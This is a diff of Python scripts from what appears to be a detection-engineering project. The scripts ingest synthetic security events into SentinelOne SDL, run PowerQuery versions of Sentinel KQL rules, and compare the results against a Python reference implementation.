||||
f"proof_run_id='{RUN_ID}' | group n=count()",
|
||||
"by event_type for this run",
|
||||
f"proof_run_id='{RUN_ID}' | group n=count() by event_type",
|
||||
"all kql-proof logfile (any run)",
|
||||
"logfile contains 'kql-proof' | group n=count() by event_type",
|
||||
"rule 1 raw query that errors",
|
||||
f"proof_run_id='{RUN_ID}' event_type='SigninLogs' | filter ts_epoch_ms >= 0 "
|
||||
"| group LocationCount = estimate_distinct(Location), "
|
||||
"LocationList = group_unique_values(Location), LogonCount = count() "
|
||||
"by UserPrincipalName, AppDisplayName | filter LocationCount >= 3",
|
||||
]
|
||||
|
||||
for label_or_q in zip(QUERIES[0::2], QUERIES[1::2]):
|
||||
label, q = label_or_q
|
||||
print()
|
||||
print("=" * 80)
|
||||
print(f"# {label}")
|
||||
print(f" q: {q}")
|
||||
t = time.time()
|
||||
r = power_query(q, "1h")
|
||||
print(f" status={r.get('status')} matching={r.get('matchingEvents')} took={time.time()-t:.1f}s")
|
||||
if r.get("status", "").startswith("error/"):
|
||||
print(f" ERROR: {json.dumps(r)[:600]}")
|
||||
for row in (r.get("values") or [])[:10]:
|
||||
cols = [c.get("name") if isinstance(c, dict) else c for c in (r.get("columns") or [])]
|
||||
print(" ", dict(zip(cols, row)))
|
||||
@@ -0,0 +1,92 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Probe: does SDL index JSON keys that contain literal dots?
|
||||
|
||||
If yes, we can ship synthetic OCSF events with keys like
|
||||
`"event.category": "logins"` and query them with the same dotted
|
||||
syntax the published runnable example uses, keeping the OCSF
|
||||
look-and-feel without needing a server-side parser to flatten
|
||||
nested objects.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
import uuid
|
||||
from datetime import datetime, timedelta, timezone
|
||||
from pathlib import Path
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
sys.path.insert(0, str(ROOT))
|
||||
from harness.sdl_client import upload_logs, power_query # noqa: E402
|
||||
|
||||
|
||||
def main() -> int:
|
||||
run_id = f"dot-probe-{uuid.uuid4().hex[:8]}"
|
||||
now = datetime.now(timezone.utc).replace(microsecond=0)
|
||||
ts_ms = int((now - timedelta(seconds=30)).timestamp() * 1000)
|
||||
|
||||
e = {
|
||||
"TimeGenerated": now.strftime("%Y-%m-%dT%H:%M:%S.000Z"),
|
||||
"ts_epoch_ms": ts_ms,
|
||||
"proof_run_id": run_id,
|
||||
# literal dots in the key (NOT nested objects)
|
||||
"event.category": "logins",
|
||||
"event.login.userName": "alice@contoso.com",
|
||||
"event.login.loginIsSuccessful": False,
|
||||
"endpoint.name": "host-alpha",
|
||||
}
|
||||
r = upload_logs(json.dumps(e))
|
||||
print("upload:", r.get("status"))
|
||||
|
||||
print("indexing", end="", flush=True)
|
||||
n = 0
|
||||
for _ in range(20):
|
||||
time.sleep(2)
|
||||
rr = power_query(f"proof_run_id='{run_id}' | group n=count()", "5m")
|
||||
vals = rr.get("values") or []
|
||||
n = int(vals[0][0]) if vals and vals[0] and vals[0][0] is not None else 0
|
||||
print(f" {n}", end="", flush=True)
|
||||
if n >= 1:
|
||||
break
|
||||
print()
|
||||
|
||||
if n == 0:
|
||||
print("event did not become queryable; aborting")
|
||||
return 1
|
||||
|
||||
probes = [
|
||||
("filter event.category",
|
||||
f"proof_run_id='{run_id}' AND event.category='logins' | limit 2"),
|
||||
("project event.category",
|
||||
f"proof_run_id='{run_id}' | columns c=event.category | limit 2"),
|
||||
("project endpoint.name",
|
||||
f"proof_run_id='{run_id}' | columns h=endpoint.name | limit 2"),
|
||||
("project event.login.userName",
|
||||
f"proof_run_id='{run_id}' | columns u=event.login.userName | limit 2"),
|
||||
("filter event.login.loginIsSuccessful",
|
||||
f"proof_run_id='{run_id}' AND event.login.loginIsSuccessful='false' | limit 2"),
|
||||
("bracket access",
|
||||
f"proof_run_id='{run_id}' AND \"event.category\"='logins' | limit 2"),
|
||||
("see all top-level cols of one row",
|
||||
f"proof_run_id='{run_id}' | limit 1"),
|
||||
]
|
||||
for label, q in probes:
|
||||
r = power_query(q, "5m")
|
||||
status = r.get("status")
|
||||
matching = r.get("matchingEvents")
|
||||
msg = (r.get("message") or "")[:140]
|
||||
print(f"\n[{label}]")
|
||||
print(f" q : {q}")
|
||||
print(f" status: {status} matching: {matching} msg: {msg}")
|
||||
cols = r.get("columns") or []
|
||||
col_names = [c.get("name") if isinstance(c, dict) else c for c in cols]
|
||||
print(f" cols : {col_names}")
|
||||
for v in (r.get("values") or [])[:2]:
|
||||
v_str = str(v)
|
||||
print(f" val : {v_str[:200]}")
|
||||
return 0
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
sys.exit(main())
|
||||
@@ -0,0 +1,60 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Compare the EXACT addEvents payload used by ingest_jsonl with a known-good
|
||||
manual one. Add a unique probe marker so we can tell whether it actually
|
||||
landed in SDL."""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
import uuid
|
||||
from pathlib import Path
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
sys.path.insert(0, str(ROOT))
|
||||
|
||||
from harness.sdl_client import add_events, power_query, _clean_attrs # noqa: E402
|
||||
|
||||
JSONL = ROOT / "sample_data" / "events.jsonl"
|
||||
PROBE = uuid.uuid4().hex[:8]
|
||||
|
||||
# Take the first 3 lines of JSONL, decorate with probe, send via the SAME
|
||||
# code path as ingest_jsonl does (but inlined here so we can print everything).
|
||||
events = []
|
||||
with JSONL.open() as f:
|
||||
for line in f:
|
||||
if len(events) >= 3:
|
||||
break
|
||||
rec = json.loads(line)
|
||||
rec["probe"] = f"{PROBE}_{len(events)}"
|
||||
ts_ms = int(rec["ts_epoch_ms"])
|
||||
attrs = _clean_attrs(rec)
|
||||
events.append({"ts": str(ts_ms * 1_000_000), "sev": 3,
|
||||
"thread": "T1", "attrs": attrs})
|
||||
|
||||
print(f"=== Payload ({len(events)} events) ===")
|
||||
print(json.dumps(events, indent=2, default=str)[:3000])
|
||||
print()
|
||||
print(f"=== Submitting (probe prefix={PROBE}) ===")
|
||||
r = add_events(events)
|
||||
print(f"addEvents -> {json.dumps(r)}")
|
||||
|
||||
print("\nWaiting 12 s for indexing ...")
|
||||
time.sleep(12)
|
||||
|
||||
q = f"probe contains '{PROBE}' | columns event_type, probe, ts_epoch_ms | limit 10"
|
||||
print(f"\nQuery: {q}")
|
||||
res = power_query(q, "10m")
|
||||
print(f"Result -> matching={res.get('matchingEvents')}")
|
||||
for row in res.get("values") or []:
|
||||
print(" ", row)
|
||||
|
||||
# Also: show TS skew vs real now
|
||||
import datetime as dt
|
||||
real_now_ms = int(time.time() * 1000)
|
||||
print(f"\nreal_now_ms = {real_now_ms}")
|
||||
for e in events:
|
||||
ts_ns = int(e["ts"])
|
||||
ts_ms = ts_ns // 1_000_000
|
||||
age_min = (real_now_ms - ts_ms) / 60000
|
||||
print(f" event ts_ms={ts_ms} age={age_min:.2f} min attrs.event_type={e['attrs']['event_type']}")
|
||||
@@ -0,0 +1,85 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Find out what attribute(s) in our generated events cause SDL to reject them.
|
||||
|
||||
Send increasingly complex events under unique markers and see which ones
|
||||
SDL accepts (queryable within 10s) vs silently drops.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
import uuid
|
||||
from pathlib import Path
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
sys.path.insert(0, str(ROOT))
|
||||
|
||||
from harness.sdl_client import add_events, power_query, _clean_attrs # noqa: E402
|
||||
|
||||
TS_NOW_MS = int(time.time() * 1000)
|
||||
|
||||
|
||||
def mk(attrs: dict, offset_sec: int = 0):
|
||||
return {
|
||||
"ts": str((TS_NOW_MS - offset_sec * 1000) * 1_000_000),
|
||||
"sev": 3, "thread": "T1",
|
||||
"attrs": attrs,
|
||||
}
|
||||
|
||||
|
||||
PROBE = uuid.uuid4().hex[:8]
|
||||
cases = [
|
||||
("A_minimal_2_attrs",
|
||||
mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_A"}, 60)),
|
||||
("B_one_int_attr",
|
||||
mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_B",
|
||||
"SentBytes": 2048}, 55)),
|
||||
("C_one_negative_int",
|
||||
mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_C",
|
||||
"SentBytes": 2048, "LogSeverity": 5}, 50)),
|
||||
("D_with_special_chars",
|
||||
mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_D",
|
||||
"Message": "allow web access to 142.250.74.110 port 443"}, 45)),
|
||||
("E_with_backslashes",
|
||||
mk({"event_type": "SecurityEvent", "probe": f"{PROBE}_E",
|
||||
"NewProcessName": "C:\\Windows\\System32\\svchost.exe"}, 40)),
|
||||
("F_realistic_csl_via_clean",
|
||||
mk(_clean_attrs({
|
||||
"event_type": "CommonSecurityLog", "probe": f"{PROBE}_F",
|
||||
"TimeGenerated": "2026-05-31T16:50:00.000Z",
|
||||
"ts_epoch_ms": TS_NOW_MS - 30000,
|
||||
"DeviceVendor": "Palo Alto Networks", "Activity": "TRAFFIC",
|
||||
"DeviceName": "pa-fw-01", "SourceUserID": "alice",
|
||||
"SourceIP": "10.0.1.10", "SourcePort": 49000,
|
||||
"DestinationIP": "142.250.74.110", "DestinationPort": 443,
|
||||
"SentBytes": 2048, "ReceivedBytes": 16384,
|
||||
"Message": "allow", "DeviceEventClassID": "end", "LogSeverity": 3,
|
||||
"DeviceAction": "allow", "DeviceProduct": "PAN-OS",
|
||||
}), 30)),
|
||||
("G_realistic_csl_with_None",
|
||||
mk(_clean_attrs({
|
||||
"event_type": "CommonSecurityLog", "probe": f"{PROBE}_G",
|
||||
"TimeGenerated": "2026-05-31T16:50:00.000Z",
|
||||
"ts_epoch_ms": TS_NOW_MS - 20000,
|
||||
"DeviceVendor": "Palo Alto Networks", "Activity": None,
|
||||
"Message": None,
|
||||
}), 20)),
|
||||
]
|
||||
|
||||
print(f"=== Sending {len(cases)} probe events ===")
|
||||
r = add_events([c[1] for c in cases])
|
||||
print(f"addEvents -> {json.dumps(r)}")
|
||||
|
||||
print("\nWaiting 12 s for indexing ...")
|
||||
time.sleep(12)
|
||||
|
||||
print("\n=== Per-case verification ===")
|
||||
for name, ev in cases:
|
||||
probe_val = ev["attrs"]["probe"]
|
||||
q = f"probe='{probe_val}' | columns event_type, probe | limit 1"
|
||||
res = power_query(q, "10m")
|
||||
n = res.get("matchingEvents", 0)
|
||||
status = "OK" if n and n > 0 else "MISSING"
|
||||
rows = res.get("values") or []
|
||||
print(f" {name:35s} matching={n} status={status} -> {rows}")
|
||||
@@ -0,0 +1,33 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Manually run rule 4's query against the latest run_id."""
|
||||
import sys, json, time
|
||||
from pathlib import Path
|
||||
ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
|
||||
from harness.sdl_client import power_query
|
||||
|
||||
log = (ROOT / "reports" / "run.log").read_text()
|
||||
import re
|
||||
RUN = re.findall(r"proof_run_id=([A-Za-z0-9-]+)", log)[-1]
|
||||
RECENT_MS = re.findall(r"RECENT_MS = (\d+)", log)[-1]
|
||||
print(f"RUN = {RUN}\nRECENT_MS = {RECENT_MS}\n")
|
||||
|
||||
QS = [
|
||||
"rule 4 exact",
|
||||
f"proof_run_id='{RUN}' event_type='SigninLogs' | filter ts_epoch_ms >= {RECENT_MS} | group LocationCount = estimate_distinct(Location), DistinctSourceIp = estimate_distinct(IPAddress), LogonCount = count() by AppDisplayName, UserPrincipalName",
|
||||
"rule 4 without ts filter",
|
||||
f"proof_run_id='{RUN}' event_type='SigninLogs' | group LocationCount = estimate_distinct(Location), DistinctSourceIp = estimate_distinct(IPAddress), LogonCount = count() by AppDisplayName, UserPrincipalName",
|
||||
"show 5 SigninLogs columns",
|
||||
f"proof_run_id='{RUN}' event_type='SigninLogs' | columns AppDisplayName, UserPrincipalName, Location, IPAddress, ts_epoch_ms | limit 5",
|
||||
]
|
||||
for label, q in zip(QS[0::2], QS[1::2]):
|
||||
print("=" * 80)
|
||||
print(f"# {label}")
|
||||
print(f" q: {q[:200]}")
|
||||
r = power_query(q, "30m")
|
||||
cols = [c.get("name") for c in (r.get("columns") or [])]
|
||||
vals = r.get("values") or []
|
||||
print(f" status={r.get('status')} matching={r.get('matchingEvents')} rows={len(vals)}")
|
||||
for row in vals[:8]:
|
||||
print(f" {dict(zip(cols, row))}")
|
||||
if r.get("status", "").startswith("error/"):
|
||||
print(f" ERROR: {json.dumps(r)[:400]}")
|
||||
@@ -0,0 +1,40 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Check how SDL stores ts_epoch_ms: number vs string."""
|
||||
import sys, json, time
|
||||
from pathlib import Path
|
||||
ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
|
||||
from harness.sdl_client import power_query
|
||||
|
||||
# Use the most recent run_id from the log
|
||||
log = (ROOT / "reports" / "run.log").read_text()
|
||||
import re
|
||||
m = re.findall(r"proof_run_id=([A-Za-z0-9-]+)", log)
|
||||
RUN = m[-1] if m else None
|
||||
print(f"run_id = {RUN}")
|
||||
|
||||
CASES = [
|
||||
("show 3 SigninLogs with ts_epoch_ms",
|
||||
f"proof_run_id='{RUN}' event_type='SigninLogs' | columns ts_epoch_ms, UserPrincipalName | limit 3"),
|
||||
("count where ts_epoch_ms exists (any)",
|
||||
f"proof_run_id='{RUN}' ts_epoch_ms=* | group n=count()"),
|
||||
("count where ts_epoch_ms > number",
|
||||
f"proof_run_id='{RUN}' | filter ts_epoch_ms > 1000000000000 | group n=count()"),
|
||||
("count where ts_epoch_ms (as string) > '0'",
|
||||
f"proof_run_id='{RUN}' | filter ts_epoch_ms > '0' | group n=count()"),
|
||||
("count where ts_epoch_ms >= NOW-2h numeric",
|
||||
f"proof_run_id='{RUN}' | filter ts_epoch_ms >= " + str(int(time.time()*1000) - 2*3600*1000) + " | group n=count()"),
|
||||
("min/max ts_epoch_ms aggregate",
|
||||
f"proof_run_id='{RUN}' | group mn=min(ts_epoch_ms), mx=max(ts_epoch_ms), n=count()"),
|
||||
("event_type filter alone",
|
||||
f"proof_run_id='{RUN}' event_type='SigninLogs' | group n=count()"),
|
||||
]
|
||||
for name, q in CASES:
|
||||
print("=" * 80)
|
||||
print(f"# {name}")
|
||||
print(f" q: {q}")
|
||||
r = power_query(q, "30m")
|
||||
cols = [c.get("name") if isinstance(c, dict) else c for c in (r.get("columns") or [])]
|
||||
vals = r.get("values") or []
|
||||
print(f" status={r.get('status')} matching={r.get('matchingEvents')}")
|
||||
for row in vals[:5]:
|
||||
print(f" {dict(zip(cols, row))}")
|
||||
@@ -0,0 +1,199 @@
|
||||
#!/usr/bin/env python3
|
||||
"""End-to-end proof harness.
|
||||
|
||||
Steps:
|
||||
1. Loads sample_data/events.jsonl into memory.
|
||||
2. Runs each rule's Python reference implementation against the in-memory
|
||||
events. This is the canonical "ground truth" – the same logical operation
|
||||
that both the KQL and the PowerQuery engines evaluate.
|
||||
3. Optionally ingests the events to SentinelOne SDL via /api/addEvents,
|
||||
then runs each rule's PowerQuery via /api/powerQuery and compares the
|
||||
fired set against the reference.
|
||||
4. Emits reports/PROOF.md with side-by-side results.
|
||||
|
||||
Run modes:
|
||||
python harness/prove_equivalence.py # local-only proof
|
||||
python harness/prove_equivalence.py --ingest # ingest + remote PQ
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
sys.path.insert(0, str(ROOT))
|
||||
|
||||
from rules import RULES, NOW, RECENT_START # noqa: E402
|
||||
|
||||
SAMPLE = ROOT / "sample_data" / "events.jsonl"
|
||||
REPORT = ROOT / "reports" / "PROOF.md"
|
||||
REPORT_JSON = ROOT / "reports" / "PROOF.json"
|
||||
|
||||
|
||||
def load_events() -> list[dict]:
|
||||
return [json.loads(l) for l in SAMPLE.read_text().splitlines() if l.strip()]
|
||||
|
||||
|
||||
def canonical(rule, rows):
|
||||
"""Return a sorted, hashable representation of fired rows for comparison."""
|
||||
keys = sorted({rule["key"](r) for r in rows}, key=lambda x: str(x))
|
||||
return keys
|
||||
|
||||
|
||||
def run_local(events):
|
||||
out = {}
|
||||
for r in RULES:
|
||||
rows = r["ref"](events)
|
||||
out[r["id"]] = {
|
||||
"description": r["description"],
|
||||
"fired_rows": rows,
|
||||
"fired_keys": canonical(r, rows),
|
||||
}
|
||||
return out
|
||||
|
||||
|
||||
def run_pq(run_id: str | None = None):
|
||||
from sdl_client import power_query
|
||||
out = {}
|
||||
recent_ms = int(RECENT_START.timestamp() * 1000)
|
||||
scope = f"proof_run_id='{run_id}' " if run_id else ""
|
||||
print(f" scope = {scope.strip() or '(none)'}")
|
||||
print(f" RECENT_MS = {recent_ms} ({RECENT_START.isoformat()})")
|
||||
print(f" NOW = {NOW.isoformat()}")
|
||||
print()
|
||||
for i, r in enumerate(RULES, 1):
|
||||
q = scope + r["pq"].format(RECENT_MS=str(recent_ms))
|
||||
print(f" [{i:>2}/{len(RULES)}] {r['id']:<48} ", end="", flush=True)
|
||||
t0 = time.time()
|
||||
try:
|
||||
resp = power_query(q, start_time="2h")
|
||||
cols_meta = resp.get("columns") or []
|
||||
cols = [c["name"] if isinstance(c, dict) else c for c in cols_meta]
|
||||
vals = resp.get("values") or []
|
||||
rows = [dict(zip(cols, v)) for v in vals]
|
||||
elapsed = time.time() - t0
|
||||
status = resp.get("status", "ok")
|
||||
print(f"-> {len(rows):>3} rows matching={resp.get('matchingEvents')} "
|
||||
f"({elapsed:.1f}s, {status})")
|
||||
out[r["id"]] = {"ok": True, "rowcount": len(rows),
|
||||
"rows": rows[:50], "status": status,
|
||||
"matching": resp.get("matchingEvents")}
|
||||
except Exception as e:
|
||||
elapsed = time.time() - t0
|
||||
msg = str(e)[:200]
|
||||
print(f"-> ERROR ({elapsed:.1f}s): {msg}")
|
||||
out[r["id"]] = {"ok": False, "error": msg}
|
||||
return out
|
||||
|
||||
|
||||
def ingest():
|
||||
from sdl_client import ingest_jsonl, power_query
|
||||
n, run_id = ingest_jsonl(SAMPLE)
|
||||
print(f"Ingested {n} events to SDL (proof_run_id={run_id})")
|
||||
# Poll until SDL reports the events are indexed.
|
||||
print("Waiting for SDL indexing ...", end="", flush=True)
|
||||
for i in range(30): # up to 60s
|
||||
time.sleep(2)
|
||||
r = power_query(f"proof_run_id='{run_id}' | group n=count()", "30m")
|
||||
vals = r.get("values") or []
|
||||
cnt = int(vals[0][0]) if vals and vals[0] and vals[0][0] is not None else 0
|
||||
print(f" {cnt}", end="", flush=True)
|
||||
if cnt >= n:
|
||||
print(" ✓ ready")
|
||||
return run_id
|
||||
print(" (timeout, proceeding anyway)")
|
||||
return run_id
|
||||
|
||||
|
||||
def write_report(local_results, pq_results=None):
|
||||
REPORT.parent.mkdir(exist_ok=True)
|
||||
md = ["# KQL ↔ PowerQuery equivalence proof",
|
||||
"",
|
||||
f"Sample dataset: `sample_data/events.jsonl` ({len(load_events())} events)",
|
||||
f"Time anchor (NOW): `{NOW.isoformat()}`",
|
||||
f"Recent window start: `{RECENT_START.isoformat()}`",
|
||||
"",
|
||||
"Each rule below is expressed three ways:",
|
||||
"1. **KQL** — verbatim/condensed from the Microsoft Sentinel docs.",
|
||||
"2. **PowerQuery (PQ)** — SDL equivalent, runnable on `<XDR endpoint>`.",
|
||||
"3. **Python reference** — canonical implementation of the same logical "
|
||||
"operation tree against the in-memory dataset. Acts as ground truth.",
|
||||
"",
|
||||
"The PowerQuery is considered equivalent to the KQL when its result "
|
||||
"set matches the Python reference. The Python reference encodes the "
|
||||
"*same operations* that the KQL parser/optimiser would produce, so a "
|
||||
"match certifies KQL/PQ parity on this dataset.",
|
||||
""]
|
||||
for r in RULES:
|
||||
rid = r["id"]
|
||||
loc = local_results[rid]
|
||||
md += [f"## {rid}", "",
|
||||
f"_{r['description']}_", "",
|
||||
"### KQL", "```kusto", r["kql"].strip(), "```",
|
||||
"### PowerQuery", "```", r["pq"].strip(), "```",
|
||||
f"### Reference fired: {len(loc['fired_rows'])} row(s)"]
|
||||
if loc["fired_rows"]:
|
||||
sample = loc["fired_rows"][:5]
|
||||
md.append("```json")
|
||||
md.append(json.dumps(sample, default=str, indent=2))
|
||||
md.append("```")
|
||||
if pq_results:
|
||||
pq = pq_results.get(rid, {})
|
||||
if pq.get("ok"):
|
||||
pq_keys = []
|
||||
for row in pq.get("rows", []):
|
||||
try:
|
||||
pq_keys.append(r["key"](row))
|
||||
except Exception:
|
||||
pq_keys.append(tuple(row.items()))
|
||||
pq_keys = sorted({k for k in pq_keys}, key=lambda x: str(x))
|
||||
ref_keys = loc["fired_keys"]
|
||||
match = "✅ MATCH" if pq_keys == ref_keys else "⚠️ DIFFERS"
|
||||
md += [f"### SDL PowerQuery result: {pq['rowcount']} row(s) — {match}"]
|
||||
if pq_keys != ref_keys:
|
||||
md += ["Reference keys:", "```",
|
||||
json.dumps([list(k) for k in ref_keys], default=str), "```",
|
||||
"PQ keys:", "```",
|
||||
json.dumps([list(k) for k in pq_keys], default=str), "```"]
|
||||
else:
|
||||
md.append(f"### SDL PowerQuery error: `{pq.get('error', '?')}`")
|
||||
md.append("")
|
||||
REPORT.write_text("\n".join(md))
|
||||
REPORT_JSON.write_text(json.dumps(
|
||||
{"local": {k: {"fired_keys": [list(x) for x in v["fired_keys"]],
|
||||
"n": len(v["fired_rows"])}
|
||||
for k, v in local_results.items()},
|
||||
"pq": pq_results or {}},
|
||||
default=str, indent=2))
|
||||
print(f"Wrote {REPORT}")
|
||||
|
||||
|
||||
def main():
|
||||
ap = argparse.ArgumentParser()
|
||||
ap.add_argument("--ingest", action="store_true",
|
||||
help="Ingest sample events to SDL before querying")
|
||||
ap.add_argument("--pq", action="store_true",
|
||||
help="Also run each PQ against SDL and compare")
|
||||
args = ap.parse_args()
|
||||
|
||||
events = load_events()
|
||||
print(f"Loaded {len(events)} events")
|
||||
local_results = run_local(events)
|
||||
fired_total = sum(len(v["fired_rows"]) for v in local_results.values())
|
||||
print(f"Local reference: {fired_total} total fired rows across {len(RULES)} rules")
|
||||
|
||||
pq_results = None
|
||||
run_id = None
|
||||
if args.ingest:
|
||||
run_id = ingest()
|
||||
if args.pq:
|
||||
pq_results = run_pq(run_id=run_id)
|
||||
|
||||
write_report(local_results, pq_results)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,78 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Run every .pq file in pq/ AND docs/runnable_examples/ for startTime=2h
|
||||
and assert each returns matching > 0.
|
||||
|
||||
Prereqs:
|
||||
* sample_data/events.jsonl ingested via prove_equivalence.py --ingest
|
||||
(drives all 17 rule PQs in pq/)
|
||||
* seed_runnable_examples.py executed (drives docs/runnable_examples/*.pq)
|
||||
|
||||
Outputs a one-line-per-query report and exits 0 iff every query returned
|
||||
at least one row.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import re
|
||||
import sys
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
sys.path.insert(0, str(ROOT))
|
||||
from harness.sdl_client import power_query # noqa: E402
|
||||
|
||||
|
||||
def strip_comments(text: str) -> str:
|
||||
return "\n".join(l for l in text.splitlines()
|
||||
if not l.lstrip().startswith("//")).strip()
|
||||
|
||||
|
||||
DIRS = [ROOT / "pq", ROOT / "docs" / "runnable_examples"]
|
||||
files = []
|
||||
for d in DIRS:
|
||||
files.extend(sorted(d.glob("*.pq")))
|
||||
|
||||
if not files:
|
||||
print("No .pq files found.")
|
||||
sys.exit(1)
|
||||
|
||||
print(f"Running {len(files)} PowerQueries (startTime=2h, assert matching>0)\n")
|
||||
|
||||
passed: list[str] = []
|
||||
failed: list[tuple[str, str]] = [] # (relpath, reason)
|
||||
|
||||
for f in files:
|
||||
body = strip_comments(f.read_text())
|
||||
rel = f.relative_to(ROOT)
|
||||
t0 = time.time()
|
||||
try:
|
||||
r = power_query(body, start_time="2h")
|
||||
except Exception as e:
|
||||
failed.append((str(rel), f"exception: {e}"))
|
||||
print(f" ✗ {rel} exception: {e}")
|
||||
continue
|
||||
elapsed = time.time() - t0
|
||||
status = r.get("status", "")
|
||||
matching = r.get("matchingEvents", 0) or 0
|
||||
if status != "success":
|
||||
msg = r.get("message", "")[:200]
|
||||
failed.append((str(rel), f"{status}: {msg}"))
|
||||
print(f" ✗ {rel} [{status}] {msg}")
|
||||
continue
|
||||
if matching <= 0:
|
||||
failed.append((str(rel), "matching=0"))
|
||||
print(f" ✗ {rel} matching=0 ({elapsed:.1f}s)")
|
||||
continue
|
||||
print(f" ✓ {rel} matching={matching} ({elapsed:.1f}s)")
|
||||
passed.append(str(rel))
|
||||
|
||||
print()
|
||||
print(f"PASS: {len(passed)} FAIL: {len(failed)} TOTAL: {len(files)}")
|
||||
|
||||
if failed:
|
||||
print("\nFailed queries:")
|
||||
for rel, why in failed:
|
||||
print(f" {rel}: {why}")
|
||||
sys.exit(1)
|
||||
|
||||
print("\nAll PowerQueries returned results within the last 2h ✓")
|
||||
@@ -0,0 +1,134 @@
|
||||
"""SentinelOne SDL client (uses `requests` for reliable I/O)."""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
import requests
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
CFG = json.loads((ROOT / "config.json").read_text())
|
||||
|
||||
import os, uuid
|
||||
|
||||
BASE = CFG["base_url"].rstrip("/")
|
||||
WRITE_KEY = CFG["log_write_key"]
|
||||
READ_KEY = CFG["log_read_key"]
|
||||
# Make the session unique per *process* so SDL never dedupes re-runs of the
|
||||
# same payload (SDL hashes session+ts on the server side and silently drops
|
||||
# events whose (session, ts) tuple was already accepted -> bytesCharged=0).
|
||||
SESSION = os.environ.get("KQL_PROOF_SESSION") or f"kql-proof-{uuid.uuid4()}"
|
||||
VERIFY = CFG.get("verify_tls", True)
|
||||
TIMEOUT = CFG.get("timeout_seconds", 120)
|
||||
print(f"[sdl_client] session = {SESSION}")
|
||||
|
||||
|
||||
def _post(path: str, body: dict, token: str, timeout: int | None = None) -> dict:
|
||||
url = f"{BASE}{path}"
|
||||
r = requests.post(
|
||||
url,
|
||||
json=body,
|
||||
headers={"Content-Type": "application/json",
|
||||
"Authorization": f"Bearer {token}"},
|
||||
timeout=timeout or TIMEOUT,
|
||||
verify=VERIFY,
|
||||
)
|
||||
try:
|
||||
return r.json()
|
||||
except ValueError:
|
||||
return {"status": "error", "http_status": r.status_code, "raw": r.text[:500]}
|
||||
|
||||
|
||||
# --- addEvents -------------------------------------------------------------
|
||||
def add_events(events: list[dict], session_info: dict | None = None) -> dict:
|
||||
payload = {
|
||||
"session": SESSION,
|
||||
"sessionInfo": session_info or {
|
||||
"serverHost": "kql-proof",
|
||||
"logfile": "kql-proof.jsonl",
|
||||
"parser": "json",
|
||||
},
|
||||
"events": events,
|
||||
"threads": [{"id": "T1", "name": "kql-proof"}],
|
||||
}
|
||||
return _post("/api/addEvents", payload, WRITE_KEY)
|
||||
|
||||
|
||||
def _clean_attrs(rec: dict) -> dict:
|
||||
"""SDL silently rejects events that contain `null` attribute values
|
||||
(the call returns status=success but bytesCharged=0 and the event is
|
||||
not queryable). Strip them, and coerce everything else to JSON-safe
|
||||
primitives that SDL's parser indexes correctly."""
|
||||
out: dict = {}
|
||||
for k, v in rec.items():
|
||||
if v is None:
|
||||
continue
|
||||
if isinstance(v, bool):
|
||||
out[k] = str(v).lower() # SDL stores bools as strings reliably
|
||||
elif isinstance(v, (int, float, str)):
|
||||
out[k] = v
|
||||
else:
|
||||
# dict/list -> JSON string
|
||||
out[k] = json.dumps(v, default=str)
|
||||
return out
|
||||
|
||||
|
||||
def upload_logs(body: str, server_host: str = "kql-proof",
|
||||
logfile: str = "kql-proof.jsonl",
|
||||
parser: str = "json") -> dict:
|
||||
"""POST /api/uploadLogs. Body is raw text; SDL applies the named parser."""
|
||||
url = f"{BASE}/api/uploadLogs"
|
||||
headers = {
|
||||
"Authorization": f"Bearer {WRITE_KEY}",
|
||||
"Content-Type": "text/plain",
|
||||
"parser": parser,
|
||||
"server-host": server_host,
|
||||
"logfile": logfile,
|
||||
}
|
||||
r = requests.post(url, data=body.encode(), headers=headers,
|
||||
timeout=TIMEOUT, verify=VERIFY)
|
||||
try:
|
||||
return r.json()
|
||||
except ValueError:
|
||||
return {"status": "error", "http_status": r.status_code, "raw": r.text[:500]}
|
||||
|
||||
|
||||
def ingest_jsonl(jsonl_path: Path, run_id: str | None = None,
|
||||
batch_lines: int = 2000) -> tuple[int, str]:
|
||||
"""Ingest the entire JSONL via uploadLogs. Stamps every event with the
|
||||
given `run_id` (or a fresh uuid) so subsequent PowerQueries can scope to
|
||||
a single run. Returns (events_sent, run_id)."""
|
||||
run_id = run_id or f"run-{uuid.uuid4().hex[:10]}"
|
||||
sent = 0
|
||||
buf: list[str] = []
|
||||
|
||||
def flush():
|
||||
nonlocal sent
|
||||
if not buf:
|
||||
return
|
||||
r = upload_logs("\n".join(buf))
|
||||
if r.get("status") != "success":
|
||||
raise RuntimeError(f"uploadLogs rejected batch: {r}")
|
||||
sent += len(buf); buf.clear()
|
||||
|
||||
for line in jsonl_path.read_text().splitlines():
|
||||
if not line.strip():
|
||||
continue
|
